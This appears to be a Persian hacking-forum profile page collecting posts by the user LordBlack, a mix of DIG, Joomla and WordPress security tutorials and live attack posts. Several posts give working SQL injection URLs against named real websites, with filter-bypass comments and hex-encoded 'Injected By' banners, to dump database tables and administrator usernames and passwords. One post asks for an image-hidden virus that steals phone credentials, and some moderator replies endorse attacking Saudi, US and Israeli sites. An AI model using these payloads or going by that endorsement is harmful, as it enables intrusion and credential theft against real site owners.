LordBlack

مدير بازنشسته
  • تعداد ارسال ها

    293
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    15

آخرین بار برد LordBlack در خرداد 28

LordBlack یکی از رکورد داران بیشترین تعداد پسند مطالب است!

درباره LordBlack

  • درجه
    P0!s0nC0d3

Profile Information

  • جنسیت
    Not Telling

آخرین بازدید کنندگان نمایه

1,510 بازدید کننده نمایه
  1. LordBlack

    ابتدا مدل مودم رو بگو تا بشه راهنمایی کرد تو مودم های tp-link در قسمت Forwarding > Virtual Servers تو مودم های D-link هم در قمست advanced
  2. LordBlack

    ابزار Domain Information Groper) DIG) یک ابزار برای پرس و جوی سرورهای DNS، شناسایی و و دریافت اطلاعات از آدرس های IP و سرورهای ایمیل و رفع مشکلات DNS است. برخی از ویژگی های ابزار DIG : میتوان از این ابزار در حالت کامندی یا batch mode استفاده کرد. از اتصال دامنه بین المللی (IDN) پشتیبانی می کند. DIG پیشرفته تر از سایر ابزارهای قدیمی مانند دستور host و nslookup است. DIG اطلاعات بیشتری نسبت به ابزارهای دیگر فراهم می کند. این ابزار یک ابزار کاربردی در BIND است. "BIND یک DNS سرور متن باز برای راه اندازی سرویس های Name Resolution یا تبدیل اسم به IP و برعکس است". BIND بر روی هر سیستم عاملی قابل نصب و اجراست در این مقاله ما BIND را در ویندوز نصب میکنیم و در آخر تعدادی از دستورات پرکاربرد DIG را معرفی میکنیم. برای نصب BIND ابتدا به آدرس http://www.isc.org/downloads/ رفته و ورژن مورد نظر را دانلود کنید نسخه ی استفاده شده در این مقاله BIND9.12.2.x64_2 است. بعد از دانلود اقدام به نصب BIND میکنیم در حالت Administrator فایل BINDInstall.exe را اجرا کنید و فقط گزینه ی Tools only را انتخاب کنید و در آخر مسیر نصب را مشخص کنید . بعد از نصب مسیر DIG را به متغیر PATHS سیستم اضافه کنید : کار نصب برنامه به اتمام رسید است در آخر برای تست دستور dig را در cmd اجرا میکنیم : در ادامه ی کار چندین دستور پرکاربرد DIG را معرفی میکنیم . 1- استفاده از گزینه های راهنما : با استفاده از گزینه ی dig -h میتوان لیست سوییچ های موجود و مورد استفاده را مشاهده کرد و همچنین با استفاده از dig -v ورژن استفاده شده را نمایش داد. 2- جستجوی پیشفرض نام دامنه : با استفاده از دستور <dig <domain میتوان آدرس IP دامنه مورد نظر را به دست آورد تحلیل نتیجه ی به دست آمده : اگر به خروجی بالا دقت کنید میبینید که دستور dig شامل دو بخش QUESTION SECTION و ANSWER SECTION است قسمت QUESTION SECTION که نوع درخواست ما که type یا متد آن A به معنی Address record است و همچنین کلاس IN که مخفف internet است را نمایش میدهد قسمت ANSWER SECTION پاسخی که از سرور DNS دریافت کرده ایم که همان آدرس IP است را نمایش میدهد. در آخر هم زمان پرس جو، سرور مورد استتفاده ، تاریخ، زمان و حجم پیام دریافتی را نمایش میدهد. 3- تنظیم اختصاصی سرور DNS : در حالت عادی پرس جوی انجام شده از DNS سرور پیشفرض انجام میگیرد که در بعضی موارد ممکن است مفید نباشد اما اگر بخواهیم از DNS سرور اختصاصی استفاده کنیم کافی است علامت @ برای تعیین DNS سرور مورد نظر را قرار دهیم dig @8.8.8.8 <domain> توجه داشته باشید وقتی از سرور های خارجی برای پرس و جو استفاده می کنیم، شبکه ما باید اجازه دسترسی خروجی به این مقصد در پورت 53 را داشته باشد، در غیر این صورت پرس و جو از بین خواهد رفت. 4- مشخص کردن نوع رکورد تا کنون به طور پیش فرض از رکورد A استفاده کردیم ، با این حال ما می تونیم هر رکورد دیگری که قادر به پرس و جو باشیم را در انتهای پرس و جو، مشخص کنیم. در این مثال، ما رکوردMail server) MX) را جستجو می کنیم. dig @8.8.8.8 guardiran.org MX 5- ترجمه معکوس نام دامنه با استفاده از دستور DIG ما می توانیم یک آدرس IP را جستجو کنیم و نام دامنه ای که آن را با پرس و جو از رکورد PTR نشان می دهد پیدا کنیم. این کار با استفاده از گزینه -x و سپس آدرس IP برای پرس و جو انجام می شود. در مثال زیر ما یک جستجوی معکوس را بر روی آدرس IP سایت گاردایران انجام می دهیم dig -x 138.201.41.253 6- خلاصه کردن نتایج خروجی با اضافه کردن سوییچ short+ تنها نتیجه ای که میخواهیم را نمایش میدهد dig -x 138.201.41.253 +short 7- ردیابی مسیر DNS با اضافه کردن سوییچ trace+ میتوان مسیر جستجوی DNS را با استفاده از سرور های نام ریشه ردیابی کرد. dig guardiran.org +trace 8- اجرای لیستی از اسامی دامنه اگر تمایل به اجرای دسته جمعی دامنه های خورد دارید میتوان یک لیست از دامنه ها را از یک فایل با پسوند .txt (یک دامنه در هر خط) استخراج کرد. در اینجا ما سه دامنه را در فایل query.txt قرار داده ایم و با استفاده از سوییچ f- فایل را به ابزار dig میدهیم. dig -f query.txt +short 9- مشخص کردن شماره پورت به طور پیشفرض پورت 53 پورت استاندارد DNS است. اگر به هردلیلی تنظیمات پیکربندی یک سرور برای پرس و جوی DNS از یک پورت دیگر استفاده کند مثلا 5300 میتوان با استفاده از سوییچ p- یک پرس و جو DNS را با استفاده از این پورت انجام داد dig @8.8.8.8 -p 5300 guardiran.org 10- سفارشی کردن نتایج خروجی با استفاده از سوییچ noall+ میتوان تمام نتایج را پنهان کرد dig guardiran.org +noall استفاده از سوییچ answer+ فقط نتیجه اصلی را به ما نمایش میدهد dig guardiran.org +noall +answer و همچنین سوییج stats+ فقط آمار و ارقام را نمایش میدهد dig guardiran.org +noall +stats 11- نمایش تمام رکورد های DNS با استفاده از گزینه ANY میتوان تمام رکوردهای DNS را مشاهده کرد dig guardiran.org ANY موفق باشید.
  3. LordBlack

    معرفی ابزار DIG

    ابزار Domain Information Groper) DIG) یک ابزار برای پرس و جوی سرورهای DNS، شناسایی و و دریافت اطلاعات از آدرس های IP و سرورهای ایمیل و رفع مشکلات DNS است. برخی از ویژگی های ابزار DIG : میتوان از این ابزار در حالت کامندی یا batch mode استفاده کرد. از اتصال دامنه بین المللی (IDN) پشتیبانی می کند. DIG پیشرفته تر از سایر ابزارهای قدیمی مانند دستور host و nslookup است. DIG اطلاعات بیشتری نسبت به ابزارهای دیگر فراهم می کند. این ابزار یک ابزار کاربردی در BIND است. "BIND یک DNS سرور متن باز برای راه اندازی سرویس های Name Resolution یا تبدیل اسم به IP و برعکس است". BIND بر روی هر سیستم عاملی قابل نصب و اجراست در این مقاله ما BIND را در ویندوز نصب میکنیم و در آخر تعدادی از دستورات پرکاربرد DIG را معرفی میکنیم. برای نصب BIND ابتدا به آدرس http://www.isc.org/downloads/ رفته و ورژن مورد نظر را دانلود کنید نسخه ی استفاده شده در این مقاله BIND9.12.2.x64_2 است. بعد از دانلود اقدام به نصب BIND میکنیم در حالت Administrator فایل BINDInstall.exe را اجرا کنید و فقط گزینه ی Tools only را انتخاب کنید و در آخر مسیر نصب را مشخص کنید . بعد از نصب مسیر DIG را به متغیر PATHS سیستم اضافه کنید : کار نصب برنامه به اتمام رسید است در آخر برای تست دستور dig را در cmd اجرا میکنیم : در ادامه ی کار چندین دستور پرکاربرد DIG را معرفی میکنیم . 1- استفاده از گزینه های راهنما : با استفاده از گزینه ی dig -h میتوان لیست سوییچ های موجود و مورد استفاده را مشاهده کرد و همچنین با استفاده از dig -v ورژن استفاده شده را نمایش داد. 2- جستجوی پیشفرض نام دامنه : با استفاده از دستور <dig <domain میتوان آدرس IP دامنه مورد نظر را به دست آورد تحلیل نتیجه ی به دست آمده : اگر به خروجی بالا دقت کنید میبینید که دستور dig شامل دو بخش QUESTION SECTION و ANSWER SECTION است قسمت QUESTION SECTION که نوع درخواست ما که type یا متد آن A به معنی Address record است و همچنین کلاس IN که مخفف internet است را نمایش میدهد قسمت ANSWER SECTION پاسخی که از سرور DNS دریافت کرده ایم که همان آدرس IP است را نمایش میدهد. در آخر هم زمان پرس جو، سرور مورد استتفاده ، تاریخ، زمان و حجم پیام دریافتی را نمایش میدهد. 3- تنظیم اختصاصی سرور DNS : در حالت عادی پرس جوی انجام شده از DNS سرور پیشفرض انجام میگیرد که در بعضی موارد ممکن است مفید نباشد اما اگر بخواهیم از DNS سرور اختصاصی استفاده کنیم کافی است علامت @ برای تعیین DNS سرور مورد نظر را قرار دهیم <dig @8.8.8.8 <domain توجه داشته باشید وقتی از سرور های خارجی برای پرس و جو استفاده می کنیم، شبکه ما باید اجازه دسترسی خروجی به این مقصد در پورت 53 را داشته باشد، در غیر این صورت پرس و جو از بین خواهد رفت. 4- مشخص کردن نوع رکورد تا کنون به طور پیش فرض از رکورد A استفاده کردیم ، با این حال ما می تونیم هر رکورد دیگری که قادر به پرس و جو باشیم را در انتهای پرس و جو، مشخص کنیم. در این مثال، ما رکوردMail server) MX) را جستجو می کنیم. dig @8.8.8.8 guardiran.org MX 5- ترجمه معکوس نام دامنه با استفاده از دستور DIG ما می توانیم یک آدرس IP را جستجو کنیم و نام دامنه ای که آن را با پرس و جو از رکورد PTR نشان می دهد پیدا کنیم. این کار با استفاده از گزینه -x و سپس آدرس IP برای پرس و جو انجام می شود. در مثال زیر ما یک جستجوی معکوس را بر روی آدرس IP سایت گاردایران انجام می دهیم dig -x 138.201.41.253 6- خلاصه کردن نتایج خروجی با اضافه کردن سوییچ short+ تنها نتیجه ای که میخواهیم را نمایش میدهد dig -x 138.201.41.253 +short 7- ردیابی مسیر DNS با اضافه کردن سوییچ trace+ میتوان مسیر جستجوی DNS را با استفاده از سرور های نام ریشه ردیابی کرد. dig guardiran.org +trace 8- اجرای لیستی از اسامی دامنه اگر تمایل به اجرای دسته جمعی دامنه های خورد دارید میتوان یک لیست از دامنه ها را از یک فایل با پسوند .txt (یک دامنه در هر خط) استخراج کرد. در اینجا ما سه دامنه را در فایل query.txt قرار داده ایم و با استفاده از سوییچ f- فایل را به ابزار dig میدهیم. dig -f query.txt +short 9- مشخص کردن شماره پورت به طور پیشفرض پورت 53 پورت استاندارد DNS است. اگر به هردلیلی تنظیمات پیکربندی یک سرور برای پرس و جوی DNS از یک پورت دیگر استفاده کند مثلا 5300 میتوان با استفاده از سوییچ p- یک پرس و جو DNS را با استفاده از این پورت انجام داد dig @8.8.8.8 -p 5300 guardiran.org 10- سفارشی کردن نتایج خروجی با استفاده از سوییچ noall+ میتوان تمام نتایج را پنهان کرد dig guardiran.org +noall استفاده از سوییچ answer+ فقط نتیجه اصلی را به ما نمایش میدهد dig guardiran.org +noall +answer و همچنین سوییج stats+ فقط آمار و ارقام را نمایش میدهد dig guardiran.org +noall +stats 11- نمایش تمام رکورد های DNS با استفاده از گزینه ANY میتوان تمام رکوردهای DNS را مشاهده کرد dig guardiran.org ANY موفق باشید.
  4. LordBlack

    ابتدا خدمتتون عرض کنم "لینوکس کالی برپایه ی دبیان" نه اینکه نسخه debian کالی لینوکس که یک حرف اشتباه برای استفاده از package manager کالی لینوکس باید مخازن رو اپدیت کنید آپدیت مخازن کالی لینوکس موفق باشید.
  5. LordBlack

    Get All The Tables and Columns http://www.arma.com.sa/news.php?id=-12%27+union%20select%201,2,(select%20(@)%20from%20(select(@:=0x00),(select%20(@)%20from%20(information_schema.columns)%20where%20(table_schema%3E=@)%20and%20(@)in%20(@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c666f6e7420636f6c6f723d626c75653e,table_name,0x3c2f666f6e743e,%27%20%3E%20%27,0x3c666f6e7420636f6c6f723d7265643e,column_name,0x3c2f666f6e743e))))x),4,5,6,7,8,9,10--+ Show All The usernames And passwords In The owners Table http://www.arma.com.sa/news.php?id=-12%27+union%20all%20select%201,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e3c63656e7465723e496e6a65637465642042792050302173306e43306433203c2f63656e7465723e3c2f666f6e743e3c62723e,(select%20(@)%20from%20(select(@:=0x00),(select%20(@)%20from%20(owners)%20where%20(@)in%20(@:=concat(@,0x3C,0x62,0x72,0x3E,0x3c62723e,0x3c623e,0x3c666f6e7420636f6c6f723d7265643e,0x557365726e616d65203a20,0x3c2f623e,0x3c2f666f6e743e,0x3c666f6e7420636f6c6f723d677265656e3e,username,%200x3c62723e,0x3c666f6e7420636f6c6f723d626c75653e,0x3c623e,0x50617373776f7264203a20,0x3c2f623e,0x3c2f666f6e743e,password))))x),4,5,6,7,8,9,10--+ : Administrator Panel http://www.arma.com.sa/admin/index.php Possible Type of hash : MD5
  6. LordBlack

    http://mlavie.ca/evenement.php?primaire=-1519677164+/*!50000union*/+/*!50000select*/+1,/*!50000GrOuP_CoNcAT(table_name)*/,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+/*!50000inforMAtion_schema*/.tables+/*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+ این مورد هم فعلا تونستم تا بایپس تیبل ها پیش ببرم نمدیونم چرا تیبل ها رو نمایش نمیده البته متدهای دیگه رو تست نکردم ممنون از تارگت های خوبی که گذاشتی ضمنا نمیدونم این پنل کاربری ادمین سایت میشه یا نه http://mlavie.ca/admin/InscriptionExterne.php
  7. LordBlack

    step 1 : http://pawt.org.pk/project-detail.php?pid=6+/*!50000union*/+/*!50000select*/+1,2,3,4,5,6,7--+ step 2 : http://pawt.org.pk/project-detail.php?pid=6+/*!50000union*/+/*!50000select*/+1,2,/*!50000gROup_cONcat(table_name)*/,4,5,6,7+from+/*!50000inforMAtion_schema*/.tables+ /*!50000wHEre*/+/*!50000taBLe_scheMA*/like+database()--+ step 3 : http://pawt.org.pk/project-detail.php?pid=-6+/*!50000union*/+/*!50000select*/+1,2,/*!50000gROup_cONcat(column_name)*/,4,5,6,7+from+/*!50000inforMAtion_schema*/.columns+/*!50000wHEre*/+/*!50000taBLe_name*/=CHAR(116,98,108,95,117,115,101,114)--+ step 4 : http://pawt.org.pk/project-detail.php?pid=-6+/*!50000union*/+/*!50000select*/+1,0x3c666f6e7420636f6c6f723d22726564222073697a653d222b32223e3c63656e7465723e496e6a65637465642042792050302173306e43306433203c2f63656e7465723e3c2f666f6e743e3c62723e,/*!50000gROup_cONcat(user_name,0x0a,user_password)*/ ,4,5,6,7+from+/*!50000tbl_user*/--+
  8. میخواستم یه ویروس درست کنم که با یه عکس مخلوط باشه و اطلاعاتی نظیر به یوزر ها و پسوورد های ذخیره تو گوشی طرف رو واسم به جیمیلم بفرسته ولی نمیدونم میشه اموزش بدید ممنون میشم ویدیو باشه بهتره 😏😊

  9. LordBlack

    بله اسکن سایت های دولتی ممنوع تو پست قبلی گفتم که هدفتون از اسکن چیه ؟ سوال با سوال جواب نمیدن اسکن سایت های عربستان امریکا انگلیس اسراییل و کلا دشمن ممنوع نیست ازاین مورد حمایت میکنیم هیچ غلطی هم نمیتونن بکنن
  10. LordBlack

    یک سوال از شما دارم ؟ سایت های دولتی رو برای چه هدف اسکن میکنید اسکن آسیب پذیری اسکن پورت یا .... موارد دیگه ؟ از روی بیکاری که اسکن نمیکنید طبیعتا اسکن به تنهایی جرم محسوب نمیشه (به غیر از سایت های دولتی یا دیگر سایت های ممنوعه)، اما اگر از آسیب پذیری سوء استفاده بشه جرم به حساب میاد. چون سایت عربستانی هستش جرم به حساب نمیاد چه دولتی باشه چه غیر دولتی
  11. LordBlack

    سلام خدمت شما دوست عزیز اگر سوال مهمی دارید در بخش پرسش سوالات مربوط به آن انجمن مطرح کنید. اسکن به تنهایی جرم محسوب نمیشه (به غیر از سایت های دولتی یا دیگر سایت های ممنوعه)، اما اگر از آسیب پذیری سوء استفاده بشه جرم به حساب میاد. اگر سایت عربستانی است از این مورد حمایت میکنیم بله ip سیستمی که از آن نفوذ انجام گرفته باید پاسخ گو باشد.
  12. LordBlack

    به نام خدا جوملا نیز همانند وردپرس یکی از مجبوب ترین و پراستفاده ترین سیستم های مدیریت محتوا در وب است. رعایت نکات امنیتی و امن کردن این سیستم مدیریت محتوا یکی از مهمترین موضوعاتی است که مدیران وب سایت ها باید به آن توجه کنند. در این آموزش نکات امینتی را بیان کرده ایم که با رعایت کردن این نکات می توان به امنیت قابل قبولی دست یافت. حذف کردن فایل های htaccess.txt و LICENSE.txt و README.txt و web.config.txt بعد از اینکه فایل های نصبی جوملا را در از حالت zip خارج کردید اقدام به حذف فایل های htaccess.txt و LICENSE.txt و README.txt و web.config.txtکنید.برای اینکه اطلاعات اولیه را از دسترس اسکنرهای جوملایی خارج کنید حتما این فایل ها را حذف کنید. انتخاب یوزر و پسورد مناسب در آدرس site.com/installation/index.php اقدام به نصب جوملا کنید. در قسمت تنظیمات اصلی برای نام کاربری مدیر ارشد یک یوزر مناسب و برای پسورد هم پسوردی مناسب را انتخاب کنید. دقت کنید از admin برای نام کاربری مدیر اصلی سایت استفاده نکنید. تنظیمات دسترسی به دیتابیس در قسمت تنظیمات پایگاه داده > نوع پایگاه داده دو نوع پایگاه داده مشخص شده است که ما روی mysqli قرار می دهیم. نوع دیگر pdo است که تفاوت این دو را در اینترنت می توانید جستجو کنید. دقت کنید نام دیتابیس و یوزر با هم یکی باشند و برای انتخاب پسورد از پسورد قوی و مناسبی استفاده کنید. موردبعدی که باید رعایت کنید استفاده از پیشوند جداول پایگاه داده است که خود جوملا برخلاف وردپرس در تنظمیات پایگاه داده قرار داده که شما میتوانید آن را تغییر دهید. این عمل بیشتر برای جلوگیری از حملات sql injection مناسب است. محدود کردن دسترسی به url صفحه ی لاگین با ست کردن کوکی (set cookie) بعد از نصب جوملا با این آدرس site.com/administrator/index.php وارد صفحه ی لاگین مدیریت خواهید شد. با استفاده از کوکی دسترسی به این صفحه را محدود میکنیم. ابتدا یک پوشه در مسیر اصلی سایت در هاست ایجاد کرده به عنوان مثال guardiran سپس یک فایل به نام index.php درون آن ایجاد می کنیم.فایل را ویرایش کرده و کد های زیر را درون آن قراردهید: <?php $cookie_code="09120000000"; setcookie("AdminGuardiranCookie ",$cookie_code,0,"/"); header("Location:/administrator/index.php"); ?> تحلیل کد بالا : ابتدا یک متغیر با نام cookie_code$ تعریف کرده و سپس مقداری را درون آن قرارداده ایم. نام متغییر و مقدار آن اختیاری است هر اسم یا مقدار دیگری میتوانید انتحاب کنید. در خط بعد با استفاده از تابع setcookie به پارامترهای آن مقدار داده ایم . تابع ( ) setcookie ، یک کوکی را به وسیله یک دستور HTTP به مرورگر کاربر ( client ) ارسال می کند. پارامتر اول name است که تعیین کننده نام کوکی است پارامتر دوم value است که مقدار کوکی را تعیین می کند که این مقدار را با استفاده از متغییر $cookie_code تعریف کرده ایم. پارامترسوم expire است تعیین کننده مدت زمان اعتبار کوکی ، بر حسب ثانیه است که مقدار آن را برابر صفر 0 قرارداده ایم. پارمترچهارم domain است که دامنه ای که کوکی بر روی آن قابل دسترس است را تعیین می کند . تابع setcooki یک پارمتردیگر به نام secure دارد که تعیین میکند که آیا کوکی فقط بایستی از طریق یک پروتکل امن HTTPS منتقل شود با خیر . مقدار پیش فرض این خاصیت FALSE بوده و تعیین آن نیز اختیاری است . در خط بعدی با استفاده از تابع ( ) header ، یک دستور HTTP را به مرورگر کاربر ( client ) ارسال کرده ایم. شکل کلی استفاده از این تابع به صورت زیر است : header( string , replace , http_response_code ) ; که تنها از پارمترstring استفاده کرده ایم. بعد از ذخیره کد بالا در مسیر اصلی سایت خود وارد پوشه administrator شوید و درون آن یک فایل htaccess. ایجاد کنید و کد های زیر را درون آن قراردهید: RewriteEngine On RewriteCond %{REQUEST_URI} ^/administrator RewriteCond %{HTTP_COOKIE} ! AdminGuardiranCookie =09120000000 RewriteRule .* - [L,F] در کد بالا گفتیم که نام کوکی+ مقدار آن که در فایل index.php در پوشه guardiran تعریف کردیم با هم برابر بود درخواست را ریدایرکت کن به صفحه administrator.php در واقع با این کار تنها کسانی که url زیر را فراخوانی کند می تواند به صفحه ی لاگین دسترسی پیدا کند چون با این کار کوکی برای آن ست میشود. Site.com/guardiran اگر هرکاربری به صورت مستقیم صفحه ی site.com/ administrator/index.php را فراخوانی کند یقناً با صفحه ی forbidden 403 مواجه خواهد شد. فعال کردن تایید دومرحله ای در صفحه لاگین پنل مدیریت بعد از ورد به پنل مدیریت با پیغامی مبنی برای "شما پیام هایی در خصوص نصب بسته دارید" مواجه خواهید شد که با زدن بر روی "خواندن پیام ها" به صفحه ی موردنظر هدایت خواهید شد. در این صفحه بر روی "فعال کردن دو عامل احرازهویت" کلیک کنید که به صفحه ی کاربران:ویرایش مشخصات میروید . در صفحه ی پیش رو یک تب جدید با نام "دو عامل احرازهویت" مشاهده میکنید. دراین قسمت یک گزینه به نام متد احراز هویت وجود دارد که شما می توانید از احراز هویت گوگل یا Yubikey استفاده کنید. در این آموزش ما از احرازهویت گوگل استفاده میکنیم. در احرازهویت گوگل ابتدا باید کد احراز هویت را از گوگل دریافت کنیم . بر روی "کد احراز هویت با سیستم عامل اندروید و..." کلیک کرده وارد صفحه ی دانلود نرم افزار Authenticator گوگل خواهید شد نرم افزار را دانلود و نصب کنید. در مرحله دوم اطلاعات احراز هویت که شامل "حساب کاربری و کلید" است را که در قدم دوم مشخص شده است به برنامه می دهیم با استفاده ازاسکن کد QR هم می توانید این کار را انجام دهید. بعد از واردکردن اطلاعات احرازهویت کدی به شما داده خواهد شد که باید در قدم سوم در قسمت کد امنیتی واردکنید. بعد از ذخیره تغییرات از پنل کاربری خارج شده و وارد صفحه ی لاگین پنل مدیریت شوید متوجه خواهید شد یک گزینه با نام کلید امنیتی اضافه شده است. کد امنیتی هر 30 ثانیه یک بار تغییر می کند. استفاده از فایل htaccess. جامع مستندات سایت جوملا درمستندات سایت جوملا به این آدرس (https://docs.joomla.org/Htaccess_examples_(security رفته و کدهای پیشنهادی htaccess. را کپی کرده و درون فایل htaccess. در مسیر اصلی سایت خود قراردهید.با این کدها خیلی از گزینه های امنیتی مثل جلوگیری از تزریق کدهای مخرب ، بایپس کردن سایت و.. برای شما فعال خواهند شد. محدود کردن سطح دسترسی فایل های configuration.php , .htaccess سطح دسترسی فایل های configuration.php , .htaccess را روی 0444 فقط خواندن قراردهید. تهیه نسخه پشتیبان بک آپ از سایت از مهترین کارهایی که یک مدیر وب سایت باید انجام دهد تهیه بک آپ از سایت خود است.سعی کنید همیشه آخرین بک آپ خود را بازگردانی کنید و برای اطمینان خاطر بیشتر نسخه های قبلی بک آپ را هم داشته باشید. موفق باشید.
  13. LordBlack

    به نام خدا امنیت در فضای مجازی همواره یکی از دغدغه های مدیران سایت ها و سرورها است . وردپرس به عنوان یکی از محبوب ترین سیستم های مدیریت محتوا در وب است که مورد استفاده طراحان و مدیران وب سایت ها قرار می گیرد وچه بسا همواره توسط هکرها و تهدیدات امنیتی مورد حمله قرار گرفته است. اگر از وردپرس به عنوان سیستم مدیریت محتوای وب سایت خود استفاده می کنید برای اینکه بتوانید سایت خود را در برابر اینگونه حملات امن نگه دارید و امنیت سایت خود را به حد قابل قبولی برسانید پس تا پایان این آموزش همراه ما باشید.دقت کنید که امنیت صد درصد نیست و نکاتی که در ادامه گفته خواهند شد اقداماتی هستند که قبل و بعد از نصب وردپرس به عنوان مدیروب سایت خود باید انجام دهید. اقدامات قبل از نصب وردپرس حذف کردن فایل های readme.html و license.txt بعد از اینکه فایل نصبی وردپرس را در هاست از حالت zip خارج کردید اقدام به حذف فایل های readme.html و license.txt کنید. این فایل ها اطلاعاتی ازجمله نسخه نگارش وردپرس و پلاگین ها را در خود دارند پس برای اینکه اطلاعات اولیه را از دسترس اسکنرهای وردپرسی خارج کنید حتما این دوتا فایل را حذف کنید. تنظیمات دسترسی به دیتابیس MySQL در فایل wp-config.php 1- فایل wp-config درابتدا با اسم wp-config-sample است که باید از حالت sample خارج شود و به wp-config تغییرنام داده شود.در قسمت DB_NAME نام دیتابیسی که ساخته اید را واردکنید، درقسمت DB_USER نام یوزردیتابیس و در قسمت DB_PASSWORD هم نام پسورد دیبتابیس را وارد کنید دقت کنید که نباید نام دیتابیس و یوزر با هم یکی باشند و برای انتخاب پسورد از پسورد قوی و مناسبی استفاده کنید. 2- مورد بعدی که در تنظیمات فایل wp-config باید به آن توجه شود Authentication Unique Keys and Salts است که کلیدهای امنیتی قابل قبولی را در فایل wp-config فعال می کند . برای فعال کردن کد های Salts از لینک https://api.wordpress.org/secret-key/1.1/salt/ که خود وردپرس در اختیار ما قرار داده است استفاده می کنیم با مراجعه به این آدرس کلید هایی را مشاهده می کنید که باید با کلید های پیشفرض خود فایل wp-config که خالی هستند جایگزین شوند. 3- آخرین مورد برای این قسمت WordPress Database Table prefix یا پیشوند جدول پایگاه داده وردپرس است که باید تغییر نام داده شود دلیل این کارهم این است که پیشوند جدول ها در پایگاه داده وردپرس درحالت عادی روی _wp است که تمامی فیلدهای جدول ما با این پشوند شروع می شوند و یقیناً برای هکرها قابل حد هست که تمامی فیلد های جدول با _wp شروع میشوند و با تغییر نام _wp به اسمی دیگر جلوی حمله های نرم افزاری را میگیریم و به مراتب کار را برای دوستان هکر سخت می کنیم. انتخاب یوزر و پسورد مناسب بعد از انجام تغییرات بالا اقدام به نصب وردپرس می کنیم در آدرس site.com/wp-admin/install.php نام کاربری پنل مدیریت و پسورد را وارد می کنیم دقت کنید که از یوزر admin به هیچ عنوان استفاده نکنید و همچنین پسورد قوی و مناسبی استفاده کنید .می -توانید از سایت های آنلاین که به صورت رندم پسورد generate میکنند استفاده کنید..اقداماتی برای جلوگیری از حملات بروت فورس است که در ادامه گفته خواهد شد. اقدامات بعد از نصب وردپرس حذف کردن فایل های نصبی وردپرس بعد از نصب وردپرس فایل های install.php و install-helper.php را پاک کنید. تغییرمسیر url صفحه ی لاگین url صفحه لاگین به صورت پیشفرض با آدرس site.com/wp-login.php قابل مشاهده است. برای تغییر این مورد ابتدا فایل wp-login.php را به عنوان مثال به guardiran.php تغییر نام داده و فایل را باز کرده و درون فایل هرجایی wp-login.php بود به جای آن guardiran.php قرار می دهیم. امن سازی پوشه wp-admin برای این کار ابتدا در کنترل پنل هاست خود برای دایرکتوری wp-admin پسورد قرار دهید . نکته ای دیگری که باید به آن توجه شود این است که بعد از log out از پنل مدیریت وارد آدرس wp-login.php نشویم در پوشه wp-includes به دنبال فایل general-template.php می گردیم. فایل را ویرایش کرده و هرجایی wp-login.php بود به جای آن همان guardiran.php قرار میدهیم . دقت کنید تنها در خط 332 ($login_url = site_url('wp-login.php', 'login');) به جای guardiran.php آدرس دیگری مثلا php.404 قراردهید. انتقال فایل wp-config از مسیر اصلی سایت فایل wp-config.php را از مسیر public_html به یک مسیرقبل تر در هاست خود انتقال دهید. مشکلی خاصی هم پیش نخواهد آمد. تغییرنام لقب مدیرسایت لقبی که به عنوان پیشفرض در سایت نمایش داده می شود به صورت پیشفرض یوزر اصلی است که در قسمت 3 انتخاب کردیم و به همین راحتی نفوذگر متوجه این موضوع خواهد شد . بنابراین در پنل مدریریت وردپرس در قسمت کاربران لقب پیشفرض را تغییر داده و در نمایش عمومی نام ، نامی که تعیین کردید را انتخاب کنید. خارج کردن لینک های غیرضروری از دسترس جستجوگر گوگل برای اینکه لینک هایی که بعضا مهم هستند و نمیخواهید در دسترس همه قرار گرفته شود را از گوگل پاک کنید کافی است به آدرس https://www.google.com/webmasters/tools/home?hl=en رفته و در قسمت وب سایت آدرس سایت خود را به عنوان مثال guardiran.org است را وارد کنید بعد از تایید وارد تب Recommended method شده و فایل HTML verification را دانلود کنید و فایل رو در مسیر اصلی سایت خود آپلود کنید سپس به صفحه ی Search Console بازگشته و بر روی verified کلیک کنید بعد از تایید به قسمت google index > Remove urls رفته و لینک های غیرضروری را پاک کنید. آپدیت کردن لحظه ای پلاگین ها و افزونه ها سعی کنید همواره افزونه هایی که نصب کردید را به روز نگه دارید البته تا جایی که امکان دارد از افزونه های غیرضروری و نامعتبر استفاده نکنید. محدود کردن ثبت نام در سایت اگر واقعا سایت شما نیازی به ثبت نام ندارد عملیات ثبت نام در سایت رو از قسمت "تنظیمات > همگانی" محدود کنید و نقش پیشفرض کاربرتازه را روی "مشترک" قرار دهید. عدم index شدن و نمایش دادن محتویات درون یک دایرکتوری برای این کار فایل htaccess. در مسیر اصلی سایت را ویرایش کرده و Options –Indexes را به آخر آن اضافه کنید. با این کار فایل ها و پوشه هایی که اجازه ایندکس شدن ندارد نمایش داده نمیشوند. امن سازی پوشه include فایل htaccess. را ویرایش کرده و به آخر آن کدهای زیر را اضافه کنید. RewriteEngine On RewriteBase / RewriteRule ^wp-admin/includes/ - [F,L] RewriteRule !^wp-includes/ - [S=3] RewriteRule ^wp-includes/[^/]+\.php$ - [F,L] RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L] RewriteRule ^wp-includes/theme-compat/ - [F,L] با این کارتمامی پوشه های include را امن می شوند. محافظت از فایل های wp-config و htaccess. با اضافه کردن این کد به فایل htaccess. عملیات خواندن را برای همه ی کاربران محدود می کند. secure wp-config.php# <Files wp-config.php> order allow,deny deny from all </Files> secure .htaccess# <Files .htaccess> order deny,allow deny from all </Files> همچنین برای اینکه دسترسی به فایل htaccess. محدود تر کنیم سطح دسترسی این فایل رو روی 0444 قرارمی دهیم. مخفی کردن ورژن و نسخه وردپرس وقتی در صفحه ی اصلی بر روی view page surce کلیک کنیم میتوان ورژن وردپرس رو در سورس مشاهده کرد برای جلوگیری از این مورد می توان کد زیر را در قسمت ویرایش پوسته ها > توابع پوسته > functions.php اضافه کرد. remove_action('wp_head', 'wp_generator'); function wpt_remove_version() { return ''; } add_filter('the_generator', 'wpt_remove_version') جلوگیری از حملات بروت فورس (Brute Force) 1- استفاده از افزونه limit login attempts : با نصب این افزونه یک گزینه با اسم limit login attempts به تنظیمات اضافه خواهد شد که در تنظیمات این این افزونه میتوان تعداد رمز های استباه را محدود کنیم و از حملات صفحه لاگین محافظت کرد با اضافه کردن کد زیر به functions.php می توان پیغام ارور صفحه لاگین را عوض کرد function failed_login () { return 'your massage'; } add_filter ( 'login_errors', 'failed_login' ); 2- استفاده از افزونه معادله امنیتی یا Captcha این 